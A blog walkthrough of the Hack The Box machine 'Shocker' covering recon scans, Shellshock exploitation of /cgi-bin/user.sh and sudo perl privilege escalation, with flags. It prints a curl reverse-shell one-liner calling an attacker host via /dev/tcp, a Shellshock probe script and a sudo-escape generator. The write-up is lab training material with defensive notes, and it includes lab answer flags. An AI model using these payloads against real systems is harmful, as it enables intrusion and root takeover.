Hacker lair Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.

HTB Shocker Linux

Enumeration reveals the shocking exploit! Root will shine as a pearl!

Recon

Nmap scan

CVEs_10.10.10.56.nmap 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
|_ CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Dirbuster scan

Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: /cgi-bin/ - 403
Dir found: / - 200
Dir found: /icons/ - 403

Gobuster scan

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.56:80/cgi-bin -s 200,204,301,302,307,403 -x sh
/user.sh (Status: 200)
Nikto scan

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.56
+ Target Hostname:    10.10.10.56
+ Target Port:        80
+ Start Time:         2019-11-04 16:30:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8673 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2019-11-04 16:34:28 (GMT-5) (234 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Exploitation Shellshock

The target machine is vulnerable to RCE via Shellshock (CVE-2014-6271). Apache's CGI handler copies request headers such as User-Agent into the script's environment (HTTP_USER_AGENT), and a vulnerable bash treats any exported value that starts with "() {" as a function definition and executes whatever follows the closing brace. Since /cgi-bin/user.sh is a shell script run by bash, a crafted User-Agent executes commands as the web server user. After a little research I came across a nice and handy curl one-liner that returns a reverse shell as the user; a netcat listener on port 5555 of the attacking host (10.10.14.25) has to be running before it is sent.

curl -H "User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.25/5555 0>&1" http://10.10.10.56/cgi-bin/user.sh
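The following helpers are an added example written for this post, not the one-liner above or anything from the box itself. They show the three things a practitioner wants around that Shellshock step: a benign probe that confirms the bug before throwing a shell, the classic local bash check for the same CVE, and the defender's grep over Apache access logs. The target URL is the one from the post; the access-log lines are constructed for the demonstration, and the probe function is the only part that needs network access.

```shell
#!/bin/sh
# Added example, not part of the original writeup. Helpers for the Shellshock
# step: build the header, probe a target without dropping a shell, check a
# local bash for CVE-2014-6271, and spot probe attempts in Apache access logs.
# 10.10.10.56 and /cgi-bin/user.sh are the target from the post; the log
# lines below are constructed for the demonstration.

# Build the User-Agent value. The "echo; echo" prefix matters when you want to
# read command output: a CGI script must emit a blank line before its body,
# otherwise Apache answers 500 and the output is lost. A reverse-shell
# payload does not need it because the connection is made before any output.
shellshock_header() {
    printf '() { :; }; echo; echo; %s' "$1"
}

# Non-destructive probe: run "echo MARKER" through the CGI script and look for
# the marker in the HTTP body. Needs network access to the target.
shellshock_probe() {
    url="$1"; marker="${2:-SHOCK_MARKER}"
    if curl -s -H "User-Agent: $(shellshock_header "echo $marker")" "$url" | grep -q "$marker"; then
        echo "vulnerable: $url"
    else
        echo "no marker returned (not vulnerable, blocked, or not a bash CGI): $url"
    fi
}

# Same bug, tested against the local bash: a vulnerable bash imports an
# exported variable whose value starts with "() {" as a function definition
# and runs whatever follows the closing brace. Returns 0 if vulnerable.
local_bash_check() {
    out=$(env x='() { :;}; echo VULNERABLE' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) return 0 ;;
        *)            return 1 ;;
    esac
}

# Defender's view: count Apache combined-log lines carrying the "() {"
# function-definition prefix anywhere in the request (User-Agent, Referer,
# Cookie and custom headers all land in the CGI environment).
count_shellshock_attempts() {
    grep -cE '\(\) *\{'
}

# Constructed sample log: two probes against user.sh and one ordinary request.
SAMPLE_LOG='10.10.14.25 - - [04/Nov/2019:16:40:01 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.25/5555 0>&1"
10.10.14.25 - - [04/Nov/2019:16:30:34 -0500] "GET /cgi-bin/ HTTP/1.1" 403 291 "-" "Mozilla/5.0 (Nikto/2.1.6)"
10.10.14.25 - - [04/Nov/2019:16:41:10 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo; echo; echo SHOCK_MARKER"'

# Usage when run directly (the probe is only attempted if a URL is given):
#   sh shellshock_helpers.sh http://10.10.10.56/cgi-bin/user.sh
printf 'Shellshock attempts in sample log: %s\n' "$(printf '%s\n' "$SAMPLE_LOG" | count_shellshock_attempts)"
if local_bash_check; then echo "local bash: VULNERABLE"; else echo "local bash: patched"; fi
if [ -n "${1:-}" ]; then shellshock_probe "$1"; fi
```

Run the probe first; if the marker comes back, start the listener with nc -lvnp 5555 on 10.10.14.25 and only then send the reverse-shell header. On the detection side the grep is deliberately broad: the `() {` prefix has no business in any request header, so a single hit is worth an alert even when the trailing command looks harmless.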

Privilege Escalation

After running the LinEnum script we find that shelly can run perl as root through sudo without a password:

[+] We can sudo without supplying a password!
Matching Defaults entries for shelly on Shocker:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
 (root) NOPASSWD: /usr/bin/perl
[+] Possible sudo pwnage!
/usr/bin/perl

We upload a Perl reverse shell, set up a netcat listener, and run the script with sudo perl to get root!
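As an added example (mine, not the author's escalation), the script below parses the sudo -l output quoted above and turns each passwordless interpreter rule into the one-liner that gives a root shell in place, with no upload and no second listener. The sudo -l text is a constructed copy of the lines shown in the post; the escapes are the standard GTFOBins-style forms for perl, python, ruby, vi/vim and awk.

```shell
#!/bin/sh
# Added example, not part of the original writeup. Reads "sudo -l" output
# (the copy below is constructed from the lines quoted above) and, for each
# NOPASSWD entry that is a bare interpreter able to spawn a shell, prints the
# one-liner that turns it into a root shell without uploading anything.

SUDO_L='Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl'

# Shell escapes for interpreters commonly seen in sudo rules (the standard
# GTFOBins-style forms). Prints the command, or returns 1 if unknown.
escape_for() {
    bin="$1"
    case "$(basename "$bin")" in
        perl)    printf "sudo %s -e 'exec \"/bin/sh\";'" "$bin" ;;
        python*) printf "sudo %s -c 'import os; os.execl(\"/bin/sh\", \"sh\")'" "$bin" ;;
        ruby)    printf "sudo %s -e 'exec \"/bin/sh\"'" "$bin" ;;
        vi|vim)  printf "sudo %s -c ':!/bin/sh'" "$bin" ;;
        awk)     printf "sudo %s 'BEGIN {system(\"/bin/sh\")}'" "$bin" ;;
        *)       return 1 ;;
    esac
}

# Parse "sudo -l" output on stdin and print "<binary><TAB><escape>" for each
# usable entry. Entries that pin arguments (e.g. "/usr/bin/perl /opt/x.pl")
# are skipped: sudo enforces the exact argument list, so the escape would be
# refused. Rules for target users other than root/ALL are also ignored.
nopasswd_escapes() {
    grep -E '^[[:space:]]*\((root|ALL)[^)]*\)[[:space:]]+NOPASSWD:' \
        | sed 's/.*NOPASSWD:[[:space:]]*//' \
        | tr ',' '\n' \
        | while read -r entry; do
            case "$entry" in
                *' '*) continue ;;   # has fixed arguments: escape not allowed
            esac
            if esc=$(escape_for "$entry"); then
                printf '%s\t%s\n' "$entry" "$esc"
            fi
        done
}

# Run on the sample above when executed directly; on a target, pipe the real
# output in with:  sudo -l | sh -c '. ./sudo_escapes.sh; nopasswd_escapes'
printf '%s\n' "$SUDO_L" | nopasswd_escapes
```

For Shocker the script prints the perl rule together with sudo /usr/bin/perl -e 'exec "/bin/sh";', which drops a root shell straight into the existing reverse shell session. Because the rule is NOPASSWD and unconstrained, a defender fixing this box would either remove it or pin perl to a specific script with its full argument list, which is exactly the case the parser skips.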

FLAGS

ROOT "52c2715605d70c7619030560dc1ca467"
USER "2ec24e11320026d1e70ff3e16695b233"